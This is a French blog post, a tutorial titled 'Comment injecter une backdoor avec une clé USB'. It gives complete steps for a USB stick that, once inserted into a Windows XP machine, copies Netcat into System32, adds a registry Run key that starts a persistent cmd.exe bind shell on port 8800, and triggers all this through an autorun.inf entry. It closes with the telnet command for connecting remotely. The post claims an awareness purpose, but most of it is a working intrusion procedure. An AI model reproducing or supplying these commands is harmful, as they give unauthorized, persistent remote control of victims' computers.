mercredi 16 janvier 2013

Comment injecter une backdoor avec une clé USB

clé USB
Dans les articles précédents nous avons vu comment  créer une clé USB qui récupère les mots de passe d’un ordinateur.
Aujourd’hui  nous allons voir comment créer une USB qui ouvre une backdoor sur un ordinateur Windows XP.
Ce rootkit s’exécute automatiquement et crée une backdoor qui  vous permet d’accéder à votre PC à distance depuis n’importe quelle machine.  Comme d’habitude l’objectif  ce tutoriel  c’est de montrer aux dirigeants d’entreprises à quel point l’utilisation des clés USB peut être dangereux. Ce qui est valable pour les entreprises ne l’est pas moins pour les simples particuliers. icon smile Comment injecter une backdoor avec une clé USB
Alors Pour créer notre USB backdoor on doit suivre les étapes suivantes:
Étape 1
Premièrement nous allons créer un dossier sur notre clé USB puis nous allons télécharger Netcat, un utilitaire permettant d’ouvrir des connexions réseau, que ce soit UDP ou TCP.
Télécharger Netcat pour windows 
Apres on dézippe Netcat dans le dossier crée.
clé USB 
Etape 2
Ensuite il faut créé un fichier backdoor.bat, ce dernier  va exécuter deux instructions :
  • Copier les fichiers du netcat dans le dossier System32 sur l’ordinateur cible
  • Ajouter une valeur chaîne dans le registre pour que notre backdoor se lance a chaque démarrage de l’ordinateur
Pour cela : on doit créer un nouveau document texte avec bloc note ou autres et écrire le code ci-dessous:
1copy *.* "%SYSTEMROOT%/System32"
2REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "backdoor"  /t "REG_SZ" /d "%SYSTEMROOT%\System32\nc.exe -d -L -e cmd.exe -p 8800"

 clé USB 
Etape 3
Maintenant il nous reste de créer le fichier autorun.inf
Dans cette étape nous allons créé une nouvelle option dans la fenêtre qui apparaît a l’insertion d’une USB, qui nous permettra (une fois cliquez dessus) notre backdoor s’installe sur l’ordinateur cible.
Pour réalisez ceci on ouvre un nouveau document texte puis on insère ce code :
1[autorun]
2 
3open=backdoor.bat
4 
5ACTION="Le nom de la nouvelle option"
Enfin on enregistre le fichier sous la racine de la clé sous le nom autorun.inf
Insérer maintenant votre clé USB, un menu s’affiche et sélectionner "Le nom de la nouvelle option"
Après un redémarrage de l’ordinateur, nous pouvons à partir de n’importe quelle machine se connecter sur le poste distant avec une simple commande:
telnet *.*.*.*  8800

clé USB


.*.*.* désigne l’adresse IP de la machine distant qui vous faut remplacer et 8800 c’est le port utiliser pr se connecter.
Faites-en bon usage.  icon biggrin Comment injecter une backdoor avec une clé USB
Publié par à
Libellés :

Aucun commentaire:

Enregistrer un commentaire

Inscription à : Publier les commentaires (Atom)